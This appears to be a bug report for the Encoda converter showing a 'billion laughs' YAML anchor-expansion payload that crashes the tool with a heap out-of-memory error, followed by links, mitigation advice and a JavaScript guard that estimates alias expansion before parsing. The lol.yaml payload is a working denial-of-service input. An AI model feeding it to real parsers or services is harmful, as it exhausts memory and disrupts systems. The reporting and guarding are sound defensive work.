encoda
Crash Encoda with YAML Entity Expansion
$ ./encoda convert lol.yaml -
lol.yaml:
a: &a ["lol","lol","lol","lol","lol","lol","lol","lol","lol"]
b: &b [*a,*a,*a,*a,*a,*a,*a,*a,*a]
c: &c [*b,*b,*b,*b,*b,*b,*b,*b,*b]
d: &d [*c,*c,*c,*c,*c,*c,*c,*c,*c]
e: &e [*d,*d,*d,*d,*d,*d,*d,*d,*d]
f: &f [*e,*e,*e,*e,*e,*e,*e,*e,*e]
g: &g [*f,*f,*f,*f,*f,*f,*f,*f,*f]
h: &h [*g,*g,*g,*g,*g,*g,*g,*g,*g]
i: &i [*h,*h,*h,*h,*h,*h,*h,*h,*h]
Result:
FATAL ERROR: CALL_AND_RETRY_LAST Allocation failed - JavaScript heap out of memory
Further resources on this:
- https://dev.to/efrat19/the-billion-laughs-attack-yaml-anchors-explained-3767
- https://github.com/kubernetes/kubernetes/issues/83253
js-yaml does not seem to have an option to deal with this attack. So it seems that the best we can probably do at present is to make a note of it in the src/codecs/yaml/README.md. If running Encoda as a service, place limits on memory consumed.
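A pre-parse guard for the expansion described above, added here as an example and not part of Encoda or js-yaml: it estimates how many nodes the aliases would expand to and rejects the document before the parser ever sees it. It assumes the one-line flow-sequence shape of lol.yaml (`key: &name [item, *alias, ...]`) and a constructed node budget of 100000.

```javascript
// Added example (not Encoda or js-yaml code): estimate how far YAML anchors
// would expand before handing a document to a parser with no alias limit.
// Assumption: the guard only understands one-line flow sequences of the form
// `key: &name [item, *alias, ...]` (the shape of lol.yaml); anything else
// counts as one node, so it under-estimates rather than rejecting by mistake.

const MAX_EXPANDED_NODES = 100000; // constructed budget a realistic document never needs

function estimateYamlExpansion(text, limit = MAX_EXPANDED_NODES) {
  const anchors = new Map(); // anchor name -> expanded node count
  let total = 0;
  for (const rawLine of text.split('\n')) {
    const line = rawLine.trim();
    if (!line || line.startsWith('#')) continue;
    // Match `key: &anchor value`; the anchor is optional.
    const m = line.match(/^[^:#]+:\s*(?:&(\S+)\s+)?(.*)$/);
    if (!m) { total += 1; continue; }
    const [, anchor, value] = m;
    let count = 1;
    const flow = value.match(/^\[(.*)\]$/);
    if (flow) {
      count = 0;
      for (const item of flow[1].split(',')) {
        const t = item.trim();
        if (!t) continue;
        // An alias costs as much as the whole structure it points to.
        count += t.startsWith('*') ? (anchors.get(t.slice(1)) ?? 1) : 1;
      }
    } else if (value.startsWith('*')) {
      count = anchors.get(value.slice(1).trim()) ?? 1;
    }
    if (anchor) anchors.set(anchor, count);
    total += count;
    if (total > limit) break; // already over budget; stop before it grows further
  }
  return total;
}

function safeToParse(text, limit = MAX_EXPANDED_NODES) {
  return estimateYamlExpansion(text, limit) <= limit;
}

// The lol.yaml document from the issue, rebuilt line by line, and a constructed harmless one.
const LOL_YAML = ['a: &a ["lol","lol","lol","lol","lol","lol","lol","lol","lol"]']
  .concat('bcdefghi'.split('').map((k, i) =>
    `${k}: &${k} [${Array(9).fill('*' + 'abcdefgh'[i]).join(',')}]`))
  .join('\n');
const BENIGN_YAML = 'name: test\nitems: &items [1, 2, 3]\ncopy: *items\n';
console.log(estimateYamlExpansion(LOL_YAML), safeToParse(LOL_YAML));       // 597870 false
console.log(estimateYamlExpansion(BENIGN_YAML), safeToParse(BENIGN_YAML)); // 7 true
```

The estimate stops counting as soon as the budget is exceeded, so the guard itself costs nothing like the expansion it prevents.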